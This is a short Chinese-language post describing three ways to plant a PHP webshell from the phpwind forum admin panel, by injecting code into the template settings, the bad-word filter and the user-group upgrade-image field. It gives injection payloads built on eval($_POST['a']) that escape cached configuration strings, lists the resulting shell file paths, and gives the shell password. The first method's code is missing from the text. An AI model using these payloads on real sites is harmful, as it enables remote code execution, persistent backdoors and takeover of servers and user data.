phpwind论坛后台拿webshell三种方法

方式1 模板法
进入后台， 风格模版设置 ，在随便一行写代码，记住，这代码必须顶着左边行写，代码前面不可以有任何字符。 
 

而后得到一个shell为http://网站/bbs/index.php。

方始2 脏话过滤法
进入安全管理 ◇ 不良词语过滤。新增不良词语写 a']='aa';eval($_POST['a']);//

替换为那里可以随意写，而后得到一个shell地址为http://网站/bbs/data/bbscache/wordsfb.php。

方式3 用户等级管理
新建立会员组，头衔你可以随便写，但是千万不要写单双引号特殊符号，升级图片号写a';eval($_POST['a']);// ，升级点数依然可以随意写。而后得到一个shell地址为http://网站/bbs/data/bbscache/level.php。

以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端

标签分类：